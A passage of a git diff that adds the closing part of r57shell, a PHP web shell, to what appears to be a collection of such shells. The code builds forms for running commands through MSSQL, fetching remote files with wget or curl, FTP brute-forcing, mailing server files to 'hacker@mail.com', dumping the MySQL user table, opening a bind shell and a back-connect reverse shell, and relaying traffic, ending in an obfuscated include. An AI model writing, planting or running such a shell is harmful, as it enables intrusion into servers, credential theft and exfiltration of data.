$te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } + +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo $te.'</div>'.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts; +echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.'</div>'.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option>MySQL</option>'; +if($mssql_on) $select .= '<option>MSSQL</option>'; +if($pg_on) $select .= '<option>PostgreSQL</option>'; +if($ora_on) $select .= '<option>Oracle</option>'; +$select .= '</select>'; +echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text77']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1')); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f; +include ($a.$b.$c); +?> + diff --git a/php/PHPshell/م€گr57م€‘/r572.jpg b/php/PHPshell/م€گr57م€‘/r572.jpg new file mode 100644 index 0000000..21835d9 Binary files /dev/null and b/php/PHPshell/م€گr57م€‘/r572.jpg differ